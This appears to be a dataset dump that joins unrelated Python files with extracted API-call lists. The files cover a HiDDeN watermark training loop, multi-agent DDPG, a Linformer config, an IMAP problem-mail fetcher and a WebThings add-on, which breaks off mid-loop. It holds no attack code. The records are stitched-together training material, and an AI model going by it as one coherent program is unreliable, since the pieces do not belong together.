[((257, 263), 'colorama.init', 'init', ([], {}), '()\n', (261, 263), False, 'from colorama import init\n'), ((312, 328), 'os.system', 'os.system', (['"""cls"""'], {}), "('cls')\n", (321, 328), False, 'import os\n'), ((341, 359), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (350, 359), False, 'import os\n'), ((2243, 2277), 'requests.get', 'requests.get', (['URL'], {'headers': 'headers'}), '(URL, headers=headers)\n', (2255, 2277), False, 'import requests\n'), ((1713, 1723), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1715, 1723), True, 'from random import choice as ch\n'), ((2051, 2060), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2053, 2060), True, 'from random import choice as ch\n'), ((2608, 2623), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2618, 2623), False, 'import time\n'), ((1700, 1710), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1702, 1710), True, 'from random import choice as ch\n'), ((2039, 2048), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2041, 2048), True, 'from random import choice as ch\n'), ((3190, 3232), 'requests.post', 'requests.post', (['WEBHOOK_URL'], {'json': 'hook_data'}), '(WEBHOOK_URL, json=hook_data)\n', (3203, 3232), False, 'import requests\n'), ((3497, 3511), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (3507, 3511), False, 'import time\n'), ((1687, 1697), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1689, 1697), True, 'from random import choice as ch\n'), ((2027, 2036), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2029, 2036), True, 'from random import choice as ch\n'), ((1674, 1684), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1676, 1684), True, 'from random import choice as ch\n'), ((2015, 2024), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2017, 2024), True, 'from random import choice as ch\n'), ((1648, 1658), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1650, 1658), True, 'from random import choice as ch\n'), ((1661, 1671), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1663, 1671), True, 'from random import choice as ch\n'), ((2003, 2012), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2005, 2012), True, 'from random import choice as ch\n'), ((1991, 2000), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1993, 2000), True, 'from random import choice as ch\n'), ((1979, 1988), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1981, 1988), True, 'from random import choice as ch\n'), ((1967, 1976), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1969, 1976), True, 'from random import choice as ch\n'), ((1955, 1964), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1957, 1964), True, 'from random import choice as ch\n'), ((1943, 1952), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1945, 1952), True, 'from random import choice as ch\n'), ((1931, 1940), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1933, 1940), True, 'from random import choice as ch\n'), ((1919, 1928), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1921, 1928), True, 'from random import choice as ch\n'), ((1907, 1916), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1909, 1916), True, 'from random import choice as ch\n'), ((1895, 1904), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1897, 1904), True, 'from random import choice as ch\n'), ((1883, 1892), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1885, 1892), True, 'from random import choice as ch\n'), ((1871, 1880), 
'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1873, 1880), True, 'from random import choice as ch\n'), ((1859, 1868), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1861, 1868), True, 'from random import choice as ch\n'), ((1847, 1856), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1849, 1856), True, 'from random import choice as ch\n'), ((1835, 1844), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1837, 1844), True, 'from random import choice as ch\n'), ((1823, 1832), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1825, 1832), True, 'from random import choice as ch\n'), ((1811, 1820), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1813, 1820), True, 'from random import choice as ch\n'), ((1799, 1808), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1801, 1808), True, 'from random import choice as ch\n'), ((1787, 1796), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1789, 1796), True, 'from random import choice as ch\n'), ((1775, 1784), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1777, 1784), True, 'from random import choice as ch\n'), ((1763, 1772), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1765, 1772), True, 'from random import choice as ch\n'), ((1739, 1748), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1741, 1748), True, 'from random import choice as ch\n'), ((1751, 1760), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1753, 1760), True, 'from random import choice as ch\n')]
|
#import cv2
import numpy as np
#import os
#import tensorflow as tf
#from tensorflow import keras
def calib_input(iter):
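    # Calibration hook (e.g. for post-training quantization): returns the first
    # 100 images from the cached feature array, scaled from [0, 255] to [0, 1].
    # The `iter` argument (which shadows the built-in) is unused here.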
X = np.load("features.npy") / 255.0
images = X[:100]
return {"conv2d_input": images}
|
[
"numpy.load"
] |
[((127, 150), 'numpy.load', 'np.load', (['"""features.npy"""'], {}), "('features.npy')\n", (134, 150), True, 'import numpy as np\n')]
|
import os
import time
import torch
import numpy as np
import utils
import logging
from options import *
from model.hidden import Hidden
from average_meter import AverageMeter
def train(model: Hidden,
device: torch.device,
hidden_config: HiDDenConfiguration,
train_options: TrainingOptions,
this_run_folder: str,
tb_logger):
"""
Trains the HiDDeN model
:param model: The model
    :param device: torch.device object, usually this is GPU (if available), otherwise CPU.
:param hidden_config: The network configuration
:param train_options: The training settings
:param this_run_folder: The parent folder for the current training run to store training artifacts/results/logs.
:param tb_logger: TensorBoardLogger object which is a thin wrapper for TensorboardX logger.
Pass None to disable TensorboardX logging
:return:
"""
train_data, val_data = utils.get_data_loaders(hidden_config, train_options)
file_count = len(train_data.dataset)
if file_count % train_options.batch_size == 0:
steps_in_epoch = file_count // train_options.batch_size
else:
steps_in_epoch = file_count // train_options.batch_size + 1
print_each = 10
images_to_save = 8
saved_images_size = (512, 512)
for epoch in range(train_options.start_epoch, train_options.number_of_epochs + 1):
logging.info('\nStarting epoch {}/{}'.format(epoch, train_options.number_of_epochs))
logging.info('Batch size = {}\nSteps in epoch = {}'.format(train_options.batch_size, steps_in_epoch))
losses_accu = {}
epoch_start = time.time()
step = 1
for image, _ in train_data:
image = image.to(device)
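            # Sample a fresh random binary message (the payload to hide) for this batch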
message = torch.Tensor(np.random.choice([0, 1], (image.shape[0], hidden_config.message_length))).to(device)
losses, _ = model.train_on_batch([image, message])
if not losses_accu: # dict is empty, initialize
for name in losses:
# losses_accu[name] = []
losses_accu[name] = AverageMeter()
for name, loss in losses.items():
losses_accu[name].update(loss)
if step % print_each == 0 or step == steps_in_epoch:
logging.info(
'Epoch: {}/{} Step: {}/{}'.format(epoch, train_options.number_of_epochs, step, steps_in_epoch))
utils.log_progress(losses_accu)
logging.info('-' * 40)
step += 1
train_duration = time.time() - epoch_start
logging.info('Epoch {} training duration {:.2f} sec'.format(epoch, train_duration))
logging.info('-' * 40)
utils.write_losses(os.path.join(this_run_folder, 'train.csv'), losses_accu, epoch, train_duration)
if tb_logger is not None:
tb_logger.save_losses(losses_accu, epoch)
tb_logger.save_grads(epoch)
tb_logger.save_tensors(epoch)
        losses_accu = {}  # reset accumulators so validation stats do not mix with training stats
        first_iteration = True
logging.info('Running validation for epoch {}/{}'.format(epoch, train_options.number_of_epochs))
for image, _ in val_data:
image = image.to(device)
message = torch.Tensor(np.random.choice([0, 1], (image.shape[0], hidden_config.message_length))).to(device)
losses, (encoded_images, noised_images, decoded_messages) = model.validate_on_batch([image, message])
if not losses_accu: # dict is empty, initialize
for name in losses:
losses_accu[name] = AverageMeter()
for name, loss in losses.items():
losses_accu[name].update(loss)
if first_iteration:
if hidden_config.enable_fp16:
image = image.float()
encoded_images = encoded_images.float()
utils.save_images(image.cpu()[:images_to_save, :, :, :],
encoded_images[:images_to_save, :, :, :].cpu(),
epoch,
os.path.join(this_run_folder, 'images'), resize_to=saved_images_size)
first_iteration = False
utils.log_progress(losses_accu)
logging.info('-' * 40)
utils.save_checkpoint(model, train_options.experiment_name, epoch, os.path.join(this_run_folder, 'checkpoints'))
utils.write_losses(os.path.join(this_run_folder, 'validation.csv'), losses_accu, epoch,
time.time() - epoch_start)
# if epoch % 10 == 0:
# sleep_sec = 5 * 60
# logging.info(f'\nSleeping for {sleep_sec} seconds to cool down the GPU\n')
# time.sleep(sleep_sec)
|
[
"utils.get_data_loaders",
"average_meter.AverageMeter",
"time.time",
"logging.info",
"numpy.random.choice",
"os.path.join",
"utils.log_progress"
] |
[((952, 1004), 'utils.get_data_loaders', 'utils.get_data_loaders', (['hidden_config', 'train_options'], {}), '(hidden_config, train_options)\n', (974, 1004), False, 'import utils\n'), ((1656, 1667), 'time.time', 'time.time', ([], {}), '()\n', (1665, 1667), False, 'import time\n'), ((2704, 2726), 'logging.info', 'logging.info', (["('-' * 40)"], {}), "('-' * 40)\n", (2716, 2726), False, 'import logging\n'), ((4221, 4252), 'utils.log_progress', 'utils.log_progress', (['losses_accu'], {}), '(losses_accu)\n', (4239, 4252), False, 'import utils\n'), ((4261, 4283), 'logging.info', 'logging.info', (["('-' * 40)"], {}), "('-' * 40)\n", (4273, 4283), False, 'import logging\n'), ((2578, 2589), 'time.time', 'time.time', ([], {}), '()\n', (2587, 2589), False, 'import time\n'), ((2754, 2796), 'os.path.join', 'os.path.join', (['this_run_folder', '"""train.csv"""'], {}), "(this_run_folder, 'train.csv')\n", (2766, 2796), False, 'import os\n'), ((4359, 4403), 'os.path.join', 'os.path.join', (['this_run_folder', '"""checkpoints"""'], {}), "(this_run_folder, 'checkpoints')\n", (4371, 4403), False, 'import os\n'), ((4432, 4479), 'os.path.join', 'os.path.join', (['this_run_folder', '"""validation.csv"""'], {}), "(this_run_folder, 'validation.csv')\n", (4444, 4479), False, 'import os\n'), ((2459, 2490), 'utils.log_progress', 'utils.log_progress', (['losses_accu'], {}), '(losses_accu)\n', (2477, 2490), False, 'import utils\n'), ((2507, 2529), 'logging.info', 'logging.info', (["('-' * 40)"], {}), "('-' * 40)\n", (2519, 2529), False, 'import logging\n'), ((4528, 4539), 'time.time', 'time.time', ([], {}), '()\n', (4537, 4539), False, 'import time\n'), ((2123, 2137), 'average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (2135, 2137), False, 'from average_meter import AverageMeter\n'), ((3584, 3598), 'average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (3596, 3598), False, 'from average_meter import AverageMeter\n'), ((4102, 4141), 'os.path.join', 'os.path.join', (['this_run_folder', '"""images"""'], {}), "(this_run_folder, 'images')\n", (4114, 4141), False, 'import os\n'), ((1793, 1865), 'numpy.random.choice', 'np.random.choice', (['[0, 1]', '(image.shape[0], hidden_config.message_length)'], {}), '([0, 1], (image.shape[0], hidden_config.message_length))\n', (1809, 1865), True, 'import numpy as np\n'), ((3248, 3320), 'numpy.random.choice', 'np.random.choice', (['[0, 1]', '(image.shape[0], hidden_config.message_length)'], {}), '([0, 1], (image.shape[0], hidden_config.message_length))\n', (3264, 3320), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 14 14:28:11 2018
@author: <NAME>
"""
import numpy as np
import numpy.random as rd
import argparse
from collections import deque
import pickle
import os
from ddpg import Actor, Critic
from make_env import make_env
import torch
dtype = torch.float
device = torch.device("cuda")
def ornsteinUhlenbeck(x_prev, mu,
sigma = 0.3, theta = 0.15, dt = 0.01):
    mu = np.zeros_like(x_prev)  # NB: this overrides the mu argument -- the process is always mean-zero
n = np.size(x_prev)
x = x_prev + theta*(mu - x_prev)*dt + sigma*np.sqrt(dt)*rd.normal(0, 1, n)
return x
def sample(buffer, N):
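    """Return N uniformly sampled transitions, or the whole buffer when it holds <= N items."""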
if len(buffer) <= N:
return buffer
else:
idx = rd.choice(len(buffer), N, replace = False)
sample = []
for i in range(N):
sample.append(buffer[idx[i]])
return sample
def episode(n_episodes, buffer_size, N, learn, render, x0, mu, sigma, theta, dt,
alpha, gamma, tau, init_actors = None, init_critics = None):
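    """Run `n_episodes` rollouts in the multi-agent env: one DDPG actor/critic
    pair per agent, a shared replay buffer, and Ornstein-Uhlenbeck exploration
    noise added to every action."""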
actors, critics = [], []
for i in range(env.n):
if init_actors is not None:
actors = init_actors
critics = init_critics
else:
actors.append(Actor(env.observation_space[i].shape[0], env.action_space[i].n))
critics.append(Critic(env.observation_space[i].shape[0], env.action_space[i].n, actors[i]))
replay_buffer = deque()
evolution = []
for ep in range(n_episodes):
noise = x0
state = env.reset()
ep_rewards = np.zeros(env.n)
step_count = 0
        done = np.array([False] * env.n)  # one done flag per agent (was hard-coded to 4)
while (not any(done) and step_count < 1000):
if render:
env.render()
###Choose an action and go to next state
actions = []
for i in range(env.n):
noise = ornsteinUhlenbeck(noise, mu, sigma, theta, dt)
action = actors[i].forwardPass(state[i]).detach().numpy()
actions.append(np.clip(action + noise, -2, 2))
next_state, rewards, done, _ = env.step(actions)
rewards = np.asarray(rewards) - 500*np.asarray(done)
ep_rewards += rewards
if learn:
###Store in the replay buffer
replay_buffer.append(np.array([state, actions, rewards, next_state]))
if len(replay_buffer)>buffer_size:
replay_buffer.popleft()
###Sample a minibatch from the buffer
minibatch = sample(replay_buffer, N)
###Learn from this minibatch
for i in range(env.n):
critics[i].learn(minibatch, i)
actors[i].learn(minibatch, i)
###Prepare for next step
step_count +=1
state = next_state
ep_rewards /= step_count
print("Episode " + str(ep) + " : " + str(ep_rewards) + " in " + str(step_count) + " steps")
evolution.append((ep_rewards, step_count))
return actors, critics, evolution
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--env', default='simple_tag_guided', type=str)
parser.add_argument('--n_episodes', default=5000, type=int)
    # NB: argparse's type=bool is a known pitfall -- any non-empty string
    # (including "False") parses as True, so these two flags are only
    # reliable through their defaults.
    parser.add_argument('--learn', default=True, type=bool)
    parser.add_argument('--render', default=False, type=bool)
    parser.add_argument('--buffer_size', default=1000, type=int)
    parser.add_argument('--minibatch_size', default=32, type=int)
    parser.add_argument('--alpha', default=0.001, type=float)
    parser.add_argument('--gamma', default=0.9, type=float)
    parser.add_argument('--tau', default=0.01, type=float)
    parser.add_argument('--ou_x0', default=0, type=float)
    parser.add_argument('--ou_mu', default=0, type=float)
    parser.add_argument('--ou_sigma', default=0.3, type=float)
    parser.add_argument('--ou_theta', default=0.15, type=float)
    parser.add_argument('--ou_dt', default=0.01, type=float)
args = parser.parse_args()
env = make_env(args.env)
actors, critics, evolution = episode(n_episodes = args.n_episodes,
buffer_size = args.buffer_size,
N = args.minibatch_size, learn = args.learn, render = args.render,
x0 = args.ou_x0 * np.ones(env.action_space[0].n),
mu = args.ou_mu * np.ones(env.action_space[0].n),
sigma = args.ou_sigma, theta = args.ou_theta, dt = args.ou_dt,
alpha = args.alpha, gamma = args.gamma, tau = args.tau)
pickle.dump(actors, open('actors','wb'))
pickle.dump(critics, open('critics','wb'))
pickle.dump(evolution, open('evolution','wb'))
print(os.getcwd())
|
[
"numpy.size",
"numpy.zeros_like",
"make_env.make_env",
"argparse.ArgumentParser",
"os.getcwd",
"numpy.asarray",
"numpy.zeros",
"numpy.ones",
"numpy.clip",
"numpy.array",
"numpy.random.normal",
"torch.device",
"ddpg.Critic",
"ddpg.Actor",
"collections.deque",
"numpy.sqrt"
] |
[((307, 327), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (319, 327), False, 'import torch\n'), ((443, 464), 'numpy.zeros_like', 'np.zeros_like', (['x_prev'], {}), '(x_prev)\n', (456, 464), True, 'import numpy as np\n'), ((477, 492), 'numpy.size', 'np.size', (['x_prev'], {}), '(x_prev)\n', (484, 492), True, 'import numpy as np\n'), ((1429, 1436), 'collections.deque', 'deque', ([], {}), '()\n', (1434, 1436), False, 'from collections import deque\n'), ((3270, 3295), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (3293, 3295), False, 'import argparse\n'), ((4229, 4247), 'make_env.make_env', 'make_env', (['args.env'], {}), '(args.env)\n', (4237, 4247), False, 'from make_env import make_env\n'), ((1589, 1604), 'numpy.zeros', 'np.zeros', (['env.n'], {}), '(env.n)\n', (1597, 1604), True, 'import numpy as np\n'), ((1643, 1664), 'numpy.array', 'np.array', (['([False] * 4)'], {}), '([False] * 4)\n', (1651, 1664), True, 'import numpy as np\n'), ((4909, 4920), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4918, 4920), False, 'import os\n'), ((557, 575), 'numpy.random.normal', 'rd.normal', (['(0)', '(1)', 'n'], {}), '(0, 1, n)\n', (566, 575), True, 'import numpy.random as rd\n'), ((545, 556), 'numpy.sqrt', 'np.sqrt', (['dt'], {}), '(dt)\n', (552, 556), True, 'import numpy as np\n'), ((1235, 1298), 'ddpg.Actor', 'Actor', (['env.observation_space[i].shape[0]', 'env.action_space[i].n'], {}), '(env.observation_space[i].shape[0], env.action_space[i].n)\n', (1240, 1298), False, 'from ddpg import Actor, Critic\n'), ((1327, 1402), 'ddpg.Critic', 'Critic', (['env.observation_space[i].shape[0]', 'env.action_space[i].n', 'actors[i]'], {}), '(env.observation_space[i].shape[0], env.action_space[i].n, actors[i])\n', (1333, 1402), False, 'from ddpg import Actor, Critic\n'), ((2196, 2215), 'numpy.asarray', 'np.asarray', (['rewards'], {}), '(rewards)\n', (2206, 2215), True, 'import numpy as np\n'), ((4514, 4544), 'numpy.ones', 'np.ones', (['env.action_space[0].n'], {}), '(env.action_space[0].n)\n', (4521, 4544), True, 'import numpy as np\n'), ((4576, 4606), 'numpy.ones', 'np.ones', (['env.action_space[0].n'], {}), '(env.action_space[0].n)\n', (4583, 4606), True, 'import numpy as np\n'), ((2081, 2111), 'numpy.clip', 'np.clip', (['(action + noise)', '(-2)', '(2)'], {}), '(action + noise, -2, 2)\n', (2088, 2111), True, 'import numpy as np\n'), ((2222, 2238), 'numpy.asarray', 'np.asarray', (['done'], {}), '(done)\n', (2232, 2238), True, 'import numpy as np\n'), ((2391, 2438), 'numpy.array', 'np.array', (['[state, actions, rewards, next_state]'], {}), '([state, actions, rewards, next_state])\n', (2399, 2438), True, 'import numpy as np\n')]
|
# coding=utf-8
# Copyright 2020 The Allen Institute for AI team and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Linformer configuration """
import logging
from typing import List, Union
from .configuration_roberta import RobertaConfig
logger = logging.getLogger(__name__)
LINFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP = {}
class LinformerConfig(RobertaConfig):
model_type = "linformer"
def __init__(
self,
max_seq_len: int = 512,
compressed: int = 1,
shared_kv_compressed: bool = False,
shared_layer_kv_compressed: bool = False,
freeze_compress: bool = False,
**kwargs,
):
"""
max_seq_len: maximum sequence length to compress from
(different from max position embeds for fairseq models)
compressed: compressed ratio of sequence length
(TODO should this be a float??)
shared_kv_compressed: share compressed matrix between k and v, in each layer
shared_layer_kv_compressed: share compressed matrix between k and v and across all layers
freeze_compress: freeze the parameters in compressed layer
"""
super().__init__(**kwargs)
self.max_seq_len = max_seq_len
self.compressed = compressed
self.shared_kv_compressed = shared_kv_compressed
self.shared_layer_kv_compressed = shared_layer_kv_compressed
self.freeze_compress = freeze_compress
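
# Illustrative usage (not part of the original file): compress 1024-token
# sequences by a factor of 4 and share the k/v projection within each layer.
# Remaining kwargs are forwarded to RobertaConfig:
#
#   config = LinformerConfig(max_seq_len=1024, compressed=4,
#                            shared_kv_compressed=True)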
|
[
"logging.getLogger"
] |
[((781, 808), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (798, 808), False, 'import logging\n')]
|
import imaplib
import json
import os
import tqdm
class Mail:
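    """Thin IMAP wrapper that fetches "Daily Coding Problem" e-mails and
    scaffolds a local folder (infos.txt + empty main.py) per problem."""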
def __init__(self, username, password, host='imap.gmail.com', port=993):
self.conn = imaplib.IMAP4_SSL(host, port)
self.conn.login(username, password)
def select_mailbox(self, mailbox='INBOX'):
self.conn.select(mailbox)
def get_emails_nums(self, subject='Daily Coding Problem: Problem', new=True, date_begin=None, date_end=None):
args = []
if subject:
args.append(f'SUBJECT "{subject}"')
if new:
args.append(f'UNSEEN')
if date_begin:
args.append(f'SINCE "{date_begin}"')
if date_end:
args.append(f'BEFORE "{date_end}"')
typ, msgnums = self.conn.search(None, *args)
msgnums = msgnums[0].split()
if typ == 'OK':
            print(f'Got {len(msgnums)} message IDs')
return typ, msgnums
else:
            print(f'[WARNING] Something went wrong when searching for e-mails: typ={typ}')
return typ, msgnums
def get_emails(self, nums, msg_parts='BODY[TEXT]'):
nums = tuple(nums)
if not isinstance(nums[0], bytes):
raise TypeError('numbers should be a list of byte-strings')
for num in tqdm.tqdm(nums):
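            # NB: brittle -- assumes the Subject line sits at a fixed offset
            # (index 64) of the decoded raw header block.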
subject = self.conn.fetch(num,
"BODY[HEADER]")[1][0][1].decode().split('\r\n')[64].split()
problem_id = subject[-2]
problem_diff = subject[-1]
data = self.conn.fetch(num,
"BODY[TEXT]")[1][0][1].decode().split('\r\n')
problem = ''
for line in data[6:]:
if line[:3] != '---':
line = line.replace('=', '')
problem += line + '\n'
else:
break
recruiter = data[6]
self._create_folder(id=problem_id, difficulty=problem_diff,
problem=problem, recruiter=recruiter)
return 0
@staticmethod
def _create_folder(**params):
try:
folder_name = f'{params["difficulty"]} Problem {params["id"]}'
os.mkdir(folder_name)
os.chdir(folder_name)
os.system(f'touch main.py')
with open('infos.txt', 'w') as fp:
fp.write(params['problem'])
fp.write(params['recruiter'])
os.chdir('../')
except KeyError as e:
print(f'A parameter is missing: {e}')
return 1
except Exception as e:
            print(f'An unexpected error occurred: {e}')
return 1
def get_data(file_name='infos.json'):
try:
with open(file_name) as fp:
data = json.load(fp)
username = data['username']
password = data['password']
return username, password
except FileNotFoundError as e:
print(f'Input file "{e.filename}" was not found in current directory: {os.getcwd()}')
return 1
except PermissionError as e:
print(f'Permission denied to read file "{file_name}"')
return 1
except json.JSONDecodeError as e:
print(f'There was an error at ({e.lineno}, {e.colno}) while decoding the file "{file_name}"')
return 1
if __name__ == '__main__':
data = get_data()
os.chdir('Problems')
mail = Mail(*data)
mail.select_mailbox()
_, nums = mail.get_emails_nums()
mail.get_emails(nums)
|
[
"imaplib.IMAP4_SSL",
"tqdm.tqdm",
"os.mkdir",
"json.load",
"os.getcwd",
"os.system",
"os.chdir"
] |
[((3359, 3379), 'os.chdir', 'os.chdir', (['"""Problems"""'], {}), "('Problems')\n", (3367, 3379), False, 'import os\n'), ((161, 190), 'imaplib.IMAP4_SSL', 'imaplib.IMAP4_SSL', (['host', 'port'], {}), '(host, port)\n', (178, 190), False, 'import imaplib\n'), ((1281, 1296), 'tqdm.tqdm', 'tqdm.tqdm', (['nums'], {}), '(nums)\n', (1290, 1296), False, 'import tqdm\n'), ((2169, 2190), 'os.mkdir', 'os.mkdir', (['folder_name'], {}), '(folder_name)\n', (2177, 2190), False, 'import os\n'), ((2203, 2224), 'os.chdir', 'os.chdir', (['folder_name'], {}), '(folder_name)\n', (2211, 2224), False, 'import os\n'), ((2238, 2265), 'os.system', 'os.system', (['f"""touch main.py"""'], {}), "(f'touch main.py')\n", (2247, 2265), False, 'import os\n'), ((2417, 2432), 'os.chdir', 'os.chdir', (['"""../"""'], {}), "('../')\n", (2425, 2432), False, 'import os\n'), ((2754, 2767), 'json.load', 'json.load', (['fp'], {}), '(fp)\n', (2763, 2767), False, 'import json\n'), ((2999, 3010), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3008, 3010), False, 'import os\n')]
|
"""Highlights API handler."""
import json
import os
import time
from time import sleep
import requests
import sys
import threading
try:
from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database
#print("succesfully loaded APIHandler and APIResponse from gateway_addon")
except:
print("Import APIHandler and APIResponse from gateway_addon failed. Use at least WebThings Gateway version 0.10")
sys.exit(1)
try:
from gateway_addon import Database
except:
print("Gateway python packages not loaded?!")
sys.exit(1)
class HighlightsAPIHandler(APIHandler):
"""Highlights API handler."""
def __init__(self, verbose=False):
"""Initialize the object."""
#print("INSIDE API HANDLER INIT")
self.addon_name = 'highlights'
self.running = True
self.server = 'http://127.0.0.1:8080'
self.DEV = True
self.DEBUG = False
self.things = [] # Holds all the things, updated via the API. Used to display a nicer thing name instead of the technical internal ID.
self.data_types_lookup_table = {}
self.token = None
# LOAD CONFIG
try:
self.add_from_config()
except Exception as ex:
print("Error loading config: " + str(ex))
self.DEBUG = True
# Get complete things dictionary via API
try:
self.things = self.api_get("/things")
#print("Did the things API call. Self.things is now:")
#print(str(self.things))
except Exception as ex:
print("Error getting updated things data via API: " + str(ex))
# Paths
# Get persistent data
try:
self.persistence_file_path = os.path.join(self.user_profile['dataDir'], self.addon_name, 'persistence.json')
except:
try:
print("setting persistence file path failed, will try older method.")
self.persistence_file_path = os.path.join(os.path.expanduser('~'), '.mozilla-iot', 'data', self.addon_name,'persistence.json')
except:
print("Double error making persistence file path")
self.persistence_file_path = "/home/pi/.mozilla/data/" + self.addon_name + "/persistence.json"
if self.DEBUG:
print("Current working directory: " + str(os.getcwd()))
first_run = False
try:
with open(self.persistence_file_path) as f:
self.persistent_data = json.load(f)
if self.DEBUG:
print("Persistence data was loaded succesfully.")
except:
first_run = True
print("Could not load persistent data (if you just installed the add-on then this is normal)")
self.persistent_data = {'items':[]}
if self.DEBUG:
print("Highlights self.persistent_data is now: " + str(self.persistent_data))
try:
self.adapter = HighlightsAdapter(self,verbose=False)
#self.manager_proxy.add_api_handler(self.extension)
#print("ADAPTER created")
except Exception as e:
print("Failed to start ADAPTER. Error: " + str(e))
# Is there user profile data?
#try:
# print(str(self.user_profile))
#except:
# print("no user profile data")
# Intiate extension addon API handler
try:
manifest_fname = os.path.join(
os.path.dirname(__file__),
'..',
'manifest.json'
)
with open(manifest_fname, 'rt') as f:
manifest = json.load(f)
APIHandler.__init__(self, manifest['id'])
self.manager_proxy.add_api_handler(self)
if self.DEBUG:
print("self.manager_proxy = " + str(self.manager_proxy))
print("Created new API HANDLER: " + str(manifest['id']))
except Exception as e:
print("Failed to init UX extension API handler: " + str(e))
# Respond to gateway version
try:
if self.DEBUG:
print(self.gateway_version)
except:
print("self.gateway_version did not exist")
# Start the internal clock
print("Starting the internal clock")
try:
t = threading.Thread(target=self.clock)
t.daemon = True
t.start()
except:
print("Error starting the clock thread")
# Read the settings from the add-on settings page
def add_from_config(self):
"""Attempt to read config data."""
try:
database = Database(self.addon_name)
if not database.open():
print("Could not open settings database")
return
config = database.load_config()
database.close()
        except:
            print("Error! Failed to open settings database.")
            return  # config would be undefined below if loading failed
if not config:
print("Error loading config from database")
return
# Api token
try:
if 'Authorization token' in config:
self.token = str(config['Authorization token'])
print("-Authorization token is present in the config data.")
except:
print("Error loading api token from settings")
if 'Debugging' in config:
self.DEBUG = bool(config['Debugging'])
if self.DEBUG:
print("-Debugging preference was in config: " + str(self.DEBUG))
#
# CLOCK
#
def clock(self):
""" Runs every second """
while self.running:
time.sleep(1)
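            # Poll each highlighted source property via the gateway API and
            # mirror its value onto the matching "highlights-*" clone device.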
try:
for item in self.persistent_data['items']:
#print(str(item))
if 'thing1' in item and 'property1' in item and 'thing1_atype' in item and 'property1_atype' in item and 'enabled' in item:
if bool(item['enabled']) == False:
continue
api_get_result = self.api_get( '/things/' + str(item['thing1']) + '/properties/' + str(item['property1']))
#print("api_get_result = " + str(api_get_result))
try:
key = list(api_get_result.keys())[0]
except:
print("error parsing the returned json")
#continue
try:
if key == "errorx":
if api_get_result[key] == 500:
print("API GET failed (500 - thing not currently connected)")
#pass
#return
else:
#print("API GET was succesfull")
original_value = api_get_result[key]
if self.DEBUG:
print("got this original value from API: " + str(original_value))
if original_value is "" or original_value is None:
#print("original value is an empty string.") # this happens if the gateway has just been rebooted, and the property doesn not have a value yet.
continue
                                if 'previous_value' not in item:
                                    item['previous_value'] = None  # NB: never updated afterwards, so the clone refreshes on every poll
try:
if str(item['previous_value']) != str(original_value):
#print("new value")
#print("get_devices = " + str(self.adapter.get_devices()))
targetDevice = self.adapter.get_device( "highlights-" + str(item['thing1']) + "-" + str(item['property1']) ) # targetDevice will be 'None' if it wasn't found.
if targetDevice == None:
if self.DEBUG:
print("target device did not exist yet: " + str(item['thing1']) )
# figure out optimal thing and property type
try:
#print("self.things = " + str(self.things))
for thing in self.things:
thing_id = str(thing['id'].rsplit('/', 1)[-1])
#print("__id: " + str(thing_id))
if str(item['thing1']) == thing_id:
#print("thing1 was thing_id at: " + str(thing_id))
#print("thing['properties'] = " + str(thing['properties']))
for thing_property_key in thing['properties']:
property_id = thing['properties'][thing_property_key]['links'][0]['href'].rsplit('/', 1)[-1]
if str(item['property1']) == property_id:
